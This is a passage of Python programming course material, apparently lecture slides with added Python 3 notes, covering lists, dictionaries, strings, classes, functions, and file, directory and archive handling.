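For readers running Python 3: there, comparing a string with a number using < raises a TypeError instead of giving a silent answer. The sketch below demonstrates this, and also shows why a pure string comparison can be surprising; the variable names are chosen for this example.

```python
b = '1.2'

# Python 3 refuses to order a string against a number
try:
    mixed = b < 100
except TypeError:
    mixed = None           # marks that the comparison was rejected

numeric = float(b) < 100   # compares 1.2 with 100 as numbers

# string comparison goes character by character:
# '2' comes after '1', so '25' is NOT less than '100' as text
textual = '25' < '100'

print(mixed, numeric, textual)
```

Converting to float before comparing is therefore usually the safer of the two alternatives on the slide.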

| bool is True or False | |
| Can mix bool with int 0 (false) or 1 (true) | |
Boolean tests:
a = ''; a = []; a = (); a = {}; # empty structures
a = 0; a = 0.0
if a: # false
if not a: # true
other values of a: if a is true
|

![]() | Initializing a list:
arglist = [myarg1, 'displacement', "tmp.ps"] |
![]() | Or with indices (if there are already two list elements):
arglist[0] = myarg1
arglist[1] = 'displacement' |
![]() | Create list of specified length:
n = 100
mylist = [0.0]*n |
![]() | Adding list elements:
arglist = [] # start with empty list
arglist.append(myarg1)
arglist.append('displacement')
|

![]() | Extract elements from a list:
filename, plottitle, psfile = arglist
(filename, plottitle, psfile) = arglist
[filename, plottitle, psfile] = arglist |
![]() | Or with indices:
filename = arglist[0]
plottitle = arglist[1] |

![]() | For each item in a list:
for entry in arglist:
print 'entry is', entry
|
![]() | For-loop-like traversal:
start = 0; stop = len(arglist); step = 1
for index in range(start, stop, step):
print 'arglist[%d]=%s' % (index,arglist[index])
|
![]() | Visiting items in reverse order:
mylist.reverse() # reverse order
for item in mylist:
# do something...
|
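Note that reverse() changes the list itself. When the original order must be kept, the built-in reversed function or a slice with step -1 can be used instead, as in this small Python 3 sketch (the variable names are illustrative).

```python
mylist = [1.4, 8.2, 10, 77]

# reversed() yields the items back to front without touching mylist
backwards = [item for item in reversed(mylist)]

# a slice with step -1 makes a reversed copy
also_backwards = mylist[::-1]

print(backwards, mylist)
```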

Compact syntax for manipulating all elements of a list:
y = [ float(yi) for yi in line.split() ] # call function float
x = [ a+i*h for i in range(n+1) ] # execute expression
(called list comprehension) | |
Written out:
y = []
for yi in line.split():
y.append(float(yi))
etc.
|

map is an alternative to list comprehension:
y = map(float, line.split())
y = map(lambda i: a+i*h, range(n+1)) | |
| map can be faster than a list comprehension when it calls an existing function such as float, but it is not as easy to read |
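A runnable comparison of the two forms, written for Python 3, where map returns an iterator rather than a list and therefore has to be wrapped in list() to get the same result. The sample values for line, a, h, and n are made up for the demonstration.

```python
line = '1.5 2 3.25'
a, h, n = 0.0, 0.5, 4

# list comprehensions
y1 = [float(yi) for yi in line.split()]
x1 = [a + i*h for i in range(n + 1)]

# map equivalents; list() materializes the iterator
y2 = list(map(float, line.split()))
x2 = list(map(lambda i: a + i*h, range(n + 1)))

print(y1, x1)
```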

d = [] # declare empty list
d.append(1.2) # add a number 1.2
d.append('a') # add a text
d[0] = 1.3 # change an item
del d[1] # delete an item
len(d) # length of list

![]() | Lists can be nested and heterogeneous |
![]() |
List of string, number, list and dictionary:
>>> mylist = ['t2.ps', 1.45, ['t2.gif', 't2.png'],\
{ 'factor' : 1.0, 'c' : 0.9} ]
>>> mylist[3]
{'c': 0.90000000000000002, 'factor': 1.0}
>>> mylist[3]['factor']
1.0
>>> print mylist
['t2.ps', 1.45, ['t2.gif', 't2.png'],
{'c': 0.90000000000000002, 'factor': 1.0}]
|
![]() | Note: print prints all basic Python data structures in a nice format |

![]() | In-place sort:
mylist.sort()
modifies mylist!
>>> print mylist
[1.4, 8.2, 77, 10]
>>> mylist.sort()
>>> print mylist
[1.4, 8.2, 10, 77] |
![]() | Strings and numbers are sorted as expected |

# ignore case when sorting:
def ignorecase_sort(s1, s2):
s1 = s1.lower()
s2 = s2.lower()
if s1 < s2: return -1
elif s1 == s2: return 0
else: return 1
# or a quicker variant, using Python's built-in
# cmp function:
def ignorecase_sort(s1, s2):
s1 = s1.lower(); s2 = s2.lower()
return cmp(s1,s2)
# usage:
mywords.sort(ignorecase_sort)
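In Python 3 the built-in cmp function is gone and sort no longer accepts a comparison function directly. The sketch below shows two possible replacements: a key function, and functools.cmp_to_key for reusing a comparison function in the old style. The word list and the name ignorecase_cmp are made up for this example.

```python
from functools import cmp_to_key

mywords = ['banana', 'Apple', 'cherry', 'apple']

# 1) key function: sort by the lowercase version of each word
by_key = sorted(mywords, key=str.lower)

# 2) old-style comparison function, adapted with cmp_to_key
def ignorecase_cmp(s1, s2):
    s1 = s1.lower(); s2 = s2.lower()
    return (s1 > s2) - (s1 < s2)     # -1, 0 or 1, like the old cmp

by_cmp = sorted(mywords, key=cmp_to_key(ignorecase_cmp))

print(by_key)
```

The key-function form is usually shorter, and since the sort is stable, words that differ only in case keep their original relative order.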

![]() |
Tuple = constant list; items cannot be modified
>>> s1=[1.2, 1.3, 1.4] # list
>>> s2=(1.2, 1.3, 1.4) # tuple
>>> s2=1.2, 1.3, 1.4 # may skip parenthesis
>>> s1[1]=0 # ok
>>> s2[1]=0 # illegal
Traceback (innermost last):
File "<pyshell#17>", line 1, in ?
s2[1]=0
TypeError: object doesn't support item assignment
>>> s2.sort()
AttributeError: 'tuple' object has no attribute 'sort'
|
![]() | You cannot append to tuples, but you can add two tuples to form a new tuple |

![]() | Dictionary = array with text indices (keys) (even user-defined objects can be indices!) |
![]() | Also called hash or associative array |
![]() | Common operations:
d['mass'] # extract item corresp. to key 'mass'
d.keys() # return copy of list of keys
d.get('mass',1.0) # return 1.0 if 'mass' is not a key
d.has_key('mass') # does d have a key 'mass'?
d.items() # return list of (key,value) tuples
del d['mass'] # delete an item
len(d) # the number of items
|
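The operations above are shown in Python 2 form. As a hedged Python 3 counterpart: has_key no longer exists (the in operator is used instead), and keys() and items() return views rather than lists. The dictionary contents below are sample values.

```python
d = {'mass': 2.0, 'damping': 0.2}

has_mass = 'mass' in d               # replaces d.has_key('mass')
stiffness = d.get('stiffness', 1.0)  # default when the key is missing
keys = sorted(d)                     # sorted list of the keys
pairs = sorted(d.items())            # sorted list of (key, value) tuples

del d['mass']                        # delete an item
remaining = len(d)

print(keys, pairs, remaining)
```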

![]() | Multiple items:
d = { 'key1' : value1, 'key2' : value2 }
|
![]() | Item by item (indexing):
d['key1'] = anothervalue1
d['key2'] = anothervalue2
d['key3'] = value2 |

![]() | Problem: store MPEG filenames corresponding to a parameter with values 1, 0.1, 0.001, 0.00001
movies[1] = 'heatsim1.mpeg'
movies[0.1] = 'heatsim2.mpeg'
movies[0.001] = 'heatsim5.mpeg'
movies[0.00001] = 'heatsim8.mpeg' |
![]() | Store compiler data:
g77 = {
'name' : 'g77',
'description' : 'GNU f77 compiler, v2.95.4',
'compile_flags' : ' -pg',
'link_flags' : ' -pg',
'libs' : '-lf2c',
'opt' : '-O3 -ffast-math -funroll-loops'
}
|

![]() | Idea: hold command-line arguments in a dictionary cmlargs[option], e.g., cmlargs['infile'], instead of separate variables |
![]() | Initialization: loop through sys.argv, assume options in pairs: --option value
arg_counter = 1
while arg_counter < len(sys.argv):
    option = sys.argv[arg_counter]
    option = option[2:] # remove double hyphen
    if option in cmlargs:
        # next command-line argument is the value:
        arg_counter += 1
        value = sys.argv[arg_counter]
        cmlargs[option] = value
    else:
        # illegal option
        pass
    arg_counter += 1
|
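The parsing loop above can be wrapped in a function so that it is easy to try out. The sketch below (Python 3) is one possible packaging, not the course's own code: the function name parse_cmlargs and the choice to collect unknown options in a list are assumptions for this example.

```python
def parse_cmlargs(argv, cmlargs):
    """Update cmlargs from '--option value' pairs in argv.

    argv is a list like sys.argv[1:]; unknown options are returned.
    """
    unknown = []
    i = 0
    while i < len(argv):
        option = argv[i][2:]                 # remove double hyphen
        if option in cmlargs and i + 1 < len(argv):
            cmlargs[option] = argv[i + 1]    # next argument is the value
            i += 2
        else:
            unknown.append(argv[i])          # not a registered option
            i += 1
    return unknown

cmlargs = {'m': '1.0', 'case': 'tmp1'}       # defaults, stored as strings
unknown = parse_cmlargs(['--m', '2.5', '--foo', '--case', 'run1'], cmlargs)
print(cmlargs, unknown)
```

All values stay strings, so numerical use still requires an explicit float(cmlargs['m']).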

![]() | Working with cmlargs in simviz1.py:
f = open(cmlargs['case'] + '.i', 'w')
f.write(cmlargs['m'] + '\n')
f.write(cmlargs['b'] + '\n')
f.write(cmlargs['c'] + '\n')
f.write(cmlargs['func'] + '\n')
...
# make gnuplot script:
f = open(cmlargs['case'] + '.gnuplot', 'w')
f.write("""
set title '%s: m=%s b=%s c=%s f(y)=%s A=%s w=%s y0=%s dt=%s';
""" % (cmlargs['case'],cmlargs['m'],cmlargs['b'],
cmlargs['c'],cmlargs['func'],cmlargs['A'],
cmlargs['w'],cmlargs['y0'],cmlargs['dt']))
if not cmlargs['noscreenplot']:
f.write("plot 'sim.dat' title 'y(t)' with lines;\n")
|
![]() | Note: all cmlargs[opt] are (here) strings! |

![]() | The dictionary-like os.environ holds the environment variables:
os.environ['PATH']
os.environ['HOME']
os.environ['scripting'] |
![]() | Write all the environment variables in alphabetic order:
sorted_env = os.environ.keys()
sorted_env.sort()
for key in sorted_env:
print '%s = %s' % (key, os.environ[key])
|

![]() | Check if a given program is on the system:
program = 'vtk'
path = os.environ['PATH']
# PATH can be /usr/bin:/usr/local/bin:/usr/X11/bin
# os.pathsep is the separator in PATH
# (: on Unix, ; on Windows)
paths = path.split(os.pathsep)
for d in paths:
if os.path.isdir(d):
if os.path.isfile(os.path.join(d, program)):
program_path = d; break
try: # program was found if program_path is defined
print '%s found in %s' % (program, program_path)
except:
print '%s not found' % program
|

![]() | On Windows, programs usually end with .exe (binaries) or .bat (DOS scripts), while on Unix most programs have no extension |
![]() | We test if we are on Windows:
if sys.platform[:3] == 'win':
# Windows-specific actions
|
![]() | Cross-platform snippet for finding a program:
for d in paths:
    if os.path.isdir(d):
        fullpath = os.path.join(d, program)
        if sys.platform[:3] == 'win': # windows machine?
            for ext in '.exe', '.bat': # add extensions
                if os.path.isfile(fullpath + ext):
                    program_path = d; break
        else:
            if os.path.isfile(fullpath):
                program_path = d; break
|
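The search can be collected in a function that returns the directory, or None when the program is not found, which avoids the try/except test on program_path. This is a sketch in Python 3 under those assumptions; find_program and the demo file myprog are invented for the example. The standard library's shutil.which offers similar functionality.

```python
import os
import shutil
import sys
import tempfile

def find_program(program, paths):
    """Return the first directory in paths containing program, else None."""
    if sys.platform[:3] == 'win':
        extensions = ['.exe', '.bat']    # typical Windows program extensions
    else:
        extensions = ['']                # no extension on Unix
    for d in paths:
        if os.path.isdir(d):
            for ext in extensions:
                if os.path.isfile(os.path.join(d, program + ext)):
                    return d
    return None

# demonstration with a temporary directory holding a fake program file
demo_dir = tempfile.mkdtemp()
ext = '.exe' if sys.platform[:3] == 'win' else ''
open(os.path.join(demo_dir, 'myprog' + ext), 'w').close()

found = find_program('myprog', ['/no/such/dir', demo_dir])
missing = find_program('no_such_program_xyz', [demo_dir])
shutil.rmtree(demo_dir)                  # clean up
print(found is not None, missing)
```

In a real script, paths would come from os.environ['PATH'].split(os.pathsep) as on the slide.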

![]() | Split string into words:
>>> files = 'case1.ps case2.ps case3.ps'
>>> files.split()
['case1.ps', 'case2.ps', 'case3.ps'] |
![]() | Can split wrt other characters:
>>> files = 'case1.ps, case2.ps, case3.ps'
>>> files.split(', ')
['case1.ps', 'case2.ps', 'case3.ps']
>>> files.split(',  ') # extra erroneous space after comma...
['case1.ps, case2.ps, case3.ps'] # unsuccessful split
|
![]() | Very useful when interpreting files |

![]() | Suppose you have a file containing numbers only |
![]() | The file can be formatted 'arbitrarily', e.g.,
1.432 5E-09 1.0 3.2 5 69 -111 4 7 8 |
![]() | Get a list of all these numbers:
f = open(filename, 'r')
numbers = f.read().split() |
![]() | A string object's split method splits with respect to sequences of whitespace (whitespace = blank character, tab, or newline) |

![]() | Convert the list of strings to a list of floating-point numbers, using a list comprehension:
numbers = [ float(x) for x in f.read().split() ] |
![]() | Think about reading this file in Fortran or C! (quite some low-level code...) |
![]() | This is a good example of how scripting languages, like Python, yield flexible and compact code |

![]() |
Join is the opposite of split:
>>> line1 = 'iteration 12: eps= 1.245E-05'
>>> line1.split()
['iteration', '12:', 'eps=', '1.245E-05']
>>> w = line1.split()
>>> ' '.join(w) # join w elements with delimiter ' '
'iteration 12: eps= 1.245E-05' |
![]() | Any delimiter text can be used:
>>> '@@@'.join(w)
'iteration@@@12:@@@eps=@@@1.245E-05' |

f = open('myfile', 'r')
lines = f.readlines() # list of lines
filestr = ''.join(lines) # a single string
# can instead just do
# filestr = f.read()
# do something with filestr, e.g., substitutions...
# convert back to list of lines:
lines = filestr.splitlines()
for line in lines:
# process line

![]() | Exact word match:
if line == 'double':
# line equals 'double'
if line.find('double') != -1:
# line contains 'double'
|
![]() | Matching with Unix shell-style wildcard
notation:
import fnmatch
if fnmatch.fnmatch(line, 'double'):
    # line matches the pattern 'double'
Here, double can be any valid wildcard expression, e.g.,
double*
[Dd]ouble |

![]() | Matching with full regular expressions:
import re
if re.search(r'double', line):
# line contains 'double'
Here, double can be any valid regular expression, e.g.,
double[A-Za-z0-9_]*
[Dd]ouble
(DOUBLE|double) |

![]() | Simple substitution:
newstring = oldstring.replace(substring, newsubstring) |
![]() | Substitute regular expression
pattern by replacement in str:
import re
str = re.sub(pattern, replacement, str) |
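A small runnable illustration of matching and substitution, in Python 3 syntax, using the [Dd]ouble pattern from the previous slide. The sample line of text is made up for the demonstration.

```python
import re

line = 'double x; Double y; float z;'

# does the line contain 'double' or 'Double'?
contains = re.search(r'[Dd]ouble', line) is not None

# all matches, in order of appearance
words = re.findall(r'[Dd]ouble', line)

# regular expression substitution handles both spellings
newline = re.sub(r'[Dd]ouble', 'float', line)

# plain replace only handles the exact substring
simple = line.replace('double', 'float')

print(newline)
print(simple)
```

The comparison of the last two results shows when the regular expression is worth the extra notation.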

![]() |
There are many ways of constructing strings in Python:
s1 = 'with forward quotes'
s2 = "with double quotes"
s3 = 'with single quotes and a variable: %(r1)g' \
% vars()
s4 = """as a triple double (or single) quoted string"""
s5 = """triple double (or single) quoted strings
allow multi-line text (i.e., newline is preserved)
with other quotes like ' and "
"""
|
![]() |
Raw strings are widely used for regular expressions
s6 = r'raw strings start with r and \ remains backslash'
s7 = r"""another raw string with a double backslash: \\ """ |

![]() | String concatenation:
myfile = filename + '_tmp' + '.dat' |
![]() | Substring extraction:
>>> teststr = '0123456789'
>>> teststr[0:5]; teststr[:5]
'01234'
'01234'
>>> teststr[3:8]
'34567'
>>> teststr[3:]
'3456789' |

![]() | The items/contents of mutable objects can be changed in-place |
![]() | Lists and dictionaries are mutable |
![]() | The items/contents of immutable objects cannot be changed in-place |
![]() | Strings and tuples are immutable
>>> s2=(1.2, 1.3, 1.4) # tuple
>>> s2[1]=0 # illegal |
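A short sketch (Python 3 syntax, illustrative names) of what "illegal" means in practice: item assignment works for a list, raises `TypeError` for a tuple, and string methods return new strings instead of changing the original.

```python
a_list = [1.2, 1.3, 1.4]
a_list[1] = 0                  # fine: lists are mutable

a_tuple = (1.2, 1.3, 1.4)
try:
    a_tuple[1] = 0             # tuples do not support item assignment
    tuple_changed = True
except TypeError:
    tuple_changed = False

s = 'abc'
t = s.replace('b', 'X')        # returns a new string; s is unchanged

print(a_list, tuple_changed, s, t)
```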

![]() | Similar class concept as in Java and C++ |
![]() | All functions are virtual |
![]() | No private/protected variables (the effect can be "simulated") |
![]() | Single and multiple inheritance |
![]() | Everything in Python is an object (an instance of some class) and works with classes |
![]() | Class programming is easier and faster than in C++ and Java (?) |

![]() | Declare a base class MyBase:
class MyBase:
    def __init__(self,i,j): # constructor
        self.i = i; self.j = j
    def write(self): # member function
        print 'MyBase: i=',self.i,'j=',self.j
|
![]() | self is a reference to this object |
![]() | Data members are prefixed by self: self.i, self.j |
![]() | All functions take self as first argument in the declaration, but not in the call
obj1 = MyBase(6,9); obj1.write() |

![]() | Class MySub is a subclass of MyBase:
class MySub(MyBase):
    def __init__(self,i,j,k): # constructor
        MyBase.__init__(self,i,j)
        self.k = k
    def write(self):
        print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
|
![]() | Example:
# this function works with any object that has a write func:
def write(v):
    v.write()
# make a MySub instance
i = MySub(7,8,9)
write(i) # will call MySub's write |
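The two classes can be tried out as a self-contained script. The sketch below is an adaptation to Python 3 syntax, not the course's original code: the `describe` method is a hypothetical helper added here so that the text can be inspected as well as printed.

```python
class MyBase:
    def __init__(self, i, j):            # constructor
        self.i = i; self.j = j

    def describe(self):                  # hypothetical helper (not in the slides)
        return 'MyBase: i=%s j=%s' % (self.i, self.j)

    def write(self):                     # member function
        print(self.describe())


class MySub(MyBase):
    def __init__(self, i, j, k):
        MyBase.__init__(self, i, j)      # initialize the base class part
        self.k = k

    def describe(self):                  # overrides MyBase.describe
        return 'MySub: i=%s j=%s k=%s' % (self.i, self.j, self.k)


def write(v):
    # works with any object that has a write method
    v.write()


objects = [MyBase(6, 9), MySub(7, 8, 9)]
for obj in objects:
    write(obj)    # the version of describe that runs depends on the object's class
```

Since all methods are virtual, `MyBase.write` picks up `MySub.describe` when called on a `MySub` instance.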

![]() | Python functions have the form
def function_name(arg1, arg2, arg3):
# statements
return something
|
![]() | Example:
import os
def debug(comment, variable):
    if os.environ.get('PYDEBUG', '0') == '1':
        print comment, variable
...
v1 = file.readlines()[3:]
debug('file %s (exclusive header):' % file.name, v1)
v2 = somefunc()
debug('result of calling somefunc:', v2)
This function prints any printable object!
|

![]() | Can name arguments, i.e., keyword=default-value
def mkdir(dirname, mode=0777, remove=1, chdir=1):
    if os.path.isdir(dirname):
        if remove: shutil.rmtree(dirname)
        else: return 0 # did not make a new directory
    os.mkdir(dirname, mode)
    if chdir: os.chdir(dirname)
    return 1 # made a new directory
Calls look like
mkdir('tmp1')
mkdir('tmp1', remove=0, mode=0755)
mkdir('tmp1', 0755, 0, 1) # less readable
|
![]() | Keyword arguments make the usage simpler and improve documentation |
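A runnable variant of the keyword-argument idea, sketched in Python 3 syntax (octal literals are written `0o755` there). It deviates from the slide in two labeled ways: `chdir` defaults to `False`, and the function works inside a scratch directory from `tempfile` so that nothing is left behind.

```python
import os
import shutil
import tempfile

def mkdir(dirname, mode=0o777, remove=True, chdir=False):
    """Make dirname; return True if a new directory was made."""
    if os.path.isdir(dirname):
        if remove:
            shutil.rmtree(dirname)
        else:
            return False               # did not make a new directory
    os.mkdir(dirname, mode)
    if chdir:
        os.chdir(dirname)
    return True                        # made a new directory

scratch = tempfile.mkdtemp()           # scratch area for the demo
target = os.path.join(scratch, 'tmp1')

first = mkdir(target)                             # all defaults
second = mkdir(target, remove=False)              # exists and is kept
third = mkdir(target, mode=0o755, remove=True)    # keywords in any order

shutil.rmtree(scratch)
print(first, second, third)
```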

![]() | Variable number of ordinary arguments:
def somefunc(a, b, *rest):
    for arg in rest:
        # treat the rest...
# call:
somefunc(1.2, 9, 'one text', 'another text')
#                ...........rest...........
|
![]() | Variable number of keyword arguments:
def somefunc(a, b, *rest, **kw):
    #...
    for arg in rest:
        # work with arg...
    for key in kw.keys():
        # work with kw[key]
|
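To see what ends up in `rest` and `kw`, one can return them from the function. This is a minimal sketch in Python 3 syntax; the keyword names `tol` and `verbose` are invented for the example.

```python
def somefunc(a, b, *rest, **kw):
    # rest is a tuple of extra positional arguments,
    # kw is a dictionary of extra keyword arguments
    return {'a': a, 'b': b, 'rest': rest, 'kw': kw}

result = somefunc(1.2, 9, 'one text', 'another text', tol=1e-3, verbose=True)
print(result['rest'])
print(result['kw'])
```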

![]() |
A function computing the average and the max and min value of a series of numbers:
def statistics(*args):
    avg = 0; n = 0; # local variables
    for number in args: # sum up all the numbers
        n = n + 1; avg = avg + number
    avg = avg / float(n) # float() to ensure non-integer division
    min = args[0]; max = args[0]
    for term in args:
        if term < min: min = term
        if term > max: max = term
    return avg, min, max # return tuple
|
![]() | Usage:
average, vmin, vmax = statistics(v1, v2, v3, b) |

![]() | The statistics function can be written more compactly using (advanced) Python functionality:
import operator
def statistics(*args):
    return (reduce(operator.add, args)/float(len(args)),
            min(args), max(args))
|
![]() | reduce(op,a): apply operation op successively on all elements in list a (here all elements are added) |
![]() | min(a), max(a): find min/max of a list a |
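In Python 3, `reduce` is no longer a built-in and must be imported from `functools`. A sketch of the compact version under that assumption, with made-up input numbers:

```python
from functools import reduce   # built-in in Python 2, in functools in Python 3
import operator

def statistics(*args):
    # reduce adds the elements pairwise from left to right
    return (reduce(operator.add, args) / float(len(args)),
            min(args), max(args))

average, vmin, vmax = statistics(1.0, 2.0, 6.0)
print(average, vmin, vmax)
```

The built-in `sum(args)` would do the same job as the `reduce` call here; `reduce` is kept to mirror the slide.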

![]() | Python scripts normally avoid call by reference and return all output variables instead |
![]() | Try to swap two numbers:
>>> def swap(a, b):
...     tmp = b; b = a; a = tmp
...
>>> a=1.2; b=1.3; swap(a, b)
>>> print a, b # have a and b been swapped?
1.2 1.3 # no...
|
![]() |
The way to do this particular task
>>> def swap(a, b):
...     return (b,a) # return tuple
...
# or smarter, just say (b,a) = (a,b) or simply b,a = a,b
|

![]() | Lists can be changed in-place in functions:
>>> def somefunc(mutable, item, item_value):
...     mutable[item] = item_value
...
>>> a = ['a','b','c'] # a list
>>> somefunc(a, 1, 'surprise')
>>> print a
['a', 'surprise', 'c'] |
![]() | This works for dictionaries and instances of user-defined classes as well (but not for tuples) |
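The contrast between rebinding a name and changing an object in place can be sketched as follows (Python 3 syntax; the function names are illustrative, not from the slides). Assignment inside a function only rebinds local names, while item assignment modifies the object the caller also refers to.

```python
def swap_inside(a, b):
    a, b = b, a            # rebinds the local names only

def set_item(mutable, item, value):
    mutable[item] = value  # in-place change, visible to the caller

x, y = 1.2, 1.3
swap_inside(x, y)
after_call = (x, y)        # unchanged by the call

x, y = y, x                # the idiomatic swap, done by the caller
after_swap = (x, y)

data = ['a', 'b', 'c']
set_item(data, 1, 'surprise')

print(after_call, after_swap, data)
```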

The Python programming style is to have input data as arguments and output data as return values:
def myfunc(i1, i2, i3, i4=False, io1=0):
    # io1: input and output variable
    ...
    # pack all output variables in a tuple:
    return io1, o1, o2, o3
# usage:
a, b, c, d = myfunc(e, f, g, h, a)
| |
| Only (a kind of) references to objects are transferred so returning a large data structure implies just returning a reference |

![]() | Variables defined inside the function are local |
![]() | To change global variables, these must be declared as global inside the function
s = 1
def myfunc(x, y):
    z = 0 # local variable, dies when we leave the func.
    global s
    s = 2 # assignment requires decl. as global
    return y-1,z+1
|
![]() | Variables can be global, local (in func.), and class attributes |
![]() | The scope of variables in nested functions may confuse newcomers (see ch. 8.7 in the course book) |

![]() | List all .ps and .gif files (Unix):
ls *.ps *.gif |
![]() | Cross-platform way to do it in Python:
import glob
filelist = glob.glob('*.ps') + glob.glob('*.gif')
This is referred to as file globbing
|

import os.path, time
print myfile,
if os.path.isfile(myfile):
    print 'is a plain file'
if os.path.isdir(myfile):
    print 'is a directory'
if os.path.islink(myfile):
    print 'is a link'
# the size and age:
size = os.path.getsize(myfile)
time_of_last_access = os.path.getatime(myfile)
time_of_last_modification = os.path.getmtime(myfile)
# times are measured in seconds since 1970.01.01
days_since_last_access = \
    (time.time() - os.path.getatime(myfile))/(3600*24)

import stat
myfile_stat = os.stat(myfile)
filesize = myfile_stat[stat.ST_SIZE]
mode = myfile_stat[stat.ST_MODE]
if stat.S_ISREG(mode):
    print '%(myfile)s is a regular file '\
          'with %(filesize)d bytes' % vars()
Check out the stat module in the Python Library Reference

![]() | Copy a file:
import shutil
shutil.copy(myfile, tmpfile) |
![]() | Rename a file:
os.rename(myfile, 'tmp.1') |
![]() | Remove a file:
os.remove('mydata')
# or os.unlink('mydata')
|

![]() |
Cross-platform construction of file paths:
filename = os.path.join(os.pardir, 'src', 'lib')
# Unix: ../src/lib
# Windows: ..\src\lib
shutil.copy(filename, os.curdir)
# Unix: cp ../src/lib .
# os.pardir : ..
# os.curdir : . |

![]() | Creating and moving to directories:
dirname = 'mynewdir'
if not os.path.isdir(dirname):
    os.mkdir(dirname) # or os.mkdir(dirname, 0755)
os.chdir(dirname)
|
![]() | Make complete directory path with intermediate directories:
path = os.path.join(os.environ['HOME'],'py','src')
os.makedirs(path)
# Unix: mkdirhier $HOME/py/src |
![]() | Remove a non-empty directory tree:
shutil.rmtree('myroot')
|

![]() | Given a path, e.g.,
fname = '/home/hpl/scripting/python/intro/hw.py' |
![]() | Extract directory and basename:
# basename: hw.py
basename = os.path.basename(fname)
# dirname: /home/hpl/scripting/python/intro
dirname = os.path.dirname(fname)
# or
dirname, basename = os.path.split(fname) |
![]() | Extract suffix:
root, suffix = os.path.splitext(fname)
# suffix: .py |
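The path functions can be checked directly on the example path. The sketch below (Python 3 syntax) uses `posixpath`, the Unix flavor of `os.path`, so that the results are the same on every platform; on Unix, `os.path` gives identical answers. The `backup` name is an invented illustration of recombining the parts.

```python
import posixpath   # Unix-style os.path, usable on any platform

fname = '/home/hpl/scripting/python/intro/hw.py'

dirname, basename = posixpath.split(fname)
root, suffix = posixpath.splitext(fname)

# build a related filename from the parts (hypothetical use case):
backup = root + '_old' + suffix

print(dirname)
print(basename)
print(suffix)
print(backup)
```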

![]() | The operating system interface in Python is the same on Unix, Windows and Mac |
![]() | Sometimes you need to perform platform-specific operations, but how can you make a portable script?
# os.name : operating system name
# sys.platform : platform identifier
# cmd: string holding command to be run
if os.name == 'posix': # Unix?
    failure, output = commands.getstatusoutput(cmd + '&')
elif sys.platform[:3] == 'win': # Windows?
    failure, output = commands.getstatusoutput('start ' + cmd)
else:
    # foreground execution:
    failure, output = commands.getstatusoutput(cmd)
|

![]() | Run through all files in your home directory and list files that are larger than 1 Mb |
![]() | A Unix find command solves the problem:
find $HOME -name '*' -type f -size +2000 \
-exec ls -s {} \;
|
![]() | This (and all features of Unix find) can be given a cross-platform implementation in Python |

![]() | Similar cross-platform Python tool:
root = os.environ['HOME'] # my home directory
os.path.walk(root, myfunc, arg)
walks through a directory tree (root) and calls, for each directory dirname,
myfunc(arg, dirname, files) # files is list of (local) filenames |
![]() | arg is any user-defined argument, e.g. a nested list of variables |

def checksize1(arg, dirname, files):
    for file in files:
        # construct the file's complete path:
        filename = os.path.join(dirname, file)
        if os.path.isfile(filename):
            size = os.path.getsize(filename)
            if size > 1000000:
                print '%.2fMb %s' % (size/1000000.0,filename)
root = os.environ['HOME']
os.path.walk(root, checksize1, None)
# arg is a user-specified (optional) argument,
# here we specify None since arg has no use
# in the present example

| Slight extension of the previous example | |
Now we use the arg variable to build a list during the walk
def checksize1(arg, dirname, files):
    for file in files:
        filepath = os.path.join(dirname, file)
        if os.path.isfile(filepath):
            size = os.path.getsize(filepath)
            if size > 1000000:
                size_in_Mb = size/1000000.0
                arg.append((size_in_Mb, filepath))
bigfiles = []
root = os.environ['HOME']
os.path.walk(root, checksize1, bigfiles)
for size, name in bigfiles:
    print name, 'is', size, 'Mb'
|

Let's build a tuple of all files instead of a list:
def checksize1(arg, dirname, files):
    for file in files:
        filepath = os.path.join(dirname, file)
        if os.path.isfile(filepath):
            size = os.path.getsize(filepath)
            if size > 1000000:
                msg = '%.2fMb %s' % (size/1000000.0, filepath)
                arg = arg + (msg,)
bigfiles = []
os.path.walk(os.environ['HOME'], checksize1, bigfiles)
for size, name in bigfiles:
    print name, 'is', size, 'Mb'
| |
| Now bigfiles is an empty list! Why? Explain in detail... (Hint: arg must be mutable) |
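`os.path.walk` exists only in Python 2; in Python 3 the generator `os.walk` plays the same role and needs no callback. The sketch below is an adaptation under that assumption, not the course's code: `find_big_files` and the tiny scratch tree it is tested on are invented for the example.

```python
import os
import shutil
import tempfile

def find_big_files(root, limit):
    """Return a list of (size, path) for plain files larger than limit bytes."""
    bigfiles = []
    for dirname, subdirs, files in os.walk(root):
        for name in files:
            filepath = os.path.join(dirname, name)
            if os.path.isfile(filepath):
                size = os.path.getsize(filepath)
                if size > limit:
                    bigfiles.append((size, filepath))  # in-place change of the list
    return bigfiles

# build a small scratch tree so the example runs anywhere:
root = tempfile.mkdtemp()
os.mkdir(os.path.join(root, 'sub'))
with open(os.path.join(root, 'small.dat'), 'wb') as f:
    f.write(b'x' * 10)
with open(os.path.join(root, 'sub', 'big.dat'), 'wb') as f:
    f.write(b'x' * 5000)

found = find_big_files(root, 1000)
shutil.rmtree(root)

for size, path in found:
    print('%d bytes: %s' % (size, path))
```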

| Tar is a widespread tool for packing file collections efficiently | |
| Very useful for software distribution or sending (large) collections of files in email | |
Demo:
>>> import tarfile
>>> files = 'NumPy_basics.py', 'hw.py', 'leastsquares.py'
>>> tar = tarfile.open('tmp.tar.gz', 'w:gz') # gzip compression
>>> for file in files:
...     tar.add(file)
...
>>> # check what's in this archive:
>>> members = tar.getmembers() # list of TarInfo objects
>>> for info in members:
...     print '%s: size=%d, mode=%s, mtime=%s' % \
...           (info.name, info.size, info.mode,
...            time.strftime('%Y.%m.%d', time.gmtime(info.mtime)))
...
NumPy_basics.py: size=11898, mode=33261, mtime=2004.11.23
hw.py: size=206, mode=33261, mtime=2005.08.12
leastsquares.py: size=1560, mode=33261, mtime=2004.09.14
>>> tar.close()
| |
| Compressions: uncompressed (w:), gzip (w:gz), bzip2 (w:bz2) |

>>> tar = tarfile.open('tmp.tar.gz', 'r')
>>>
>>> for file in tar.getmembers():
...     tar.extract(file) # extract file to current work.dir.
...
>>> # do we have all the files?
>>> allfiles = os.listdir(os.curdir)
>>> for file in files:
...     if not file in allfiles: print 'missing', file
...
>>> hw = tar.extractfile('hw.py') # extract as file object
>>> hw.readlines()
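A self-contained round trip with `tarfile`, sketched in Python 3 syntax. The file name `hw.py` echoes the demo above, but the file content and the scratch directory are created by the example itself, so nothing outside a temporary directory is touched.

```python
import os
import shutil
import tarfile
import tempfile

workdir = tempfile.mkdtemp()                 # scratch directory for the demo
src = os.path.join(workdir, 'hw.py')
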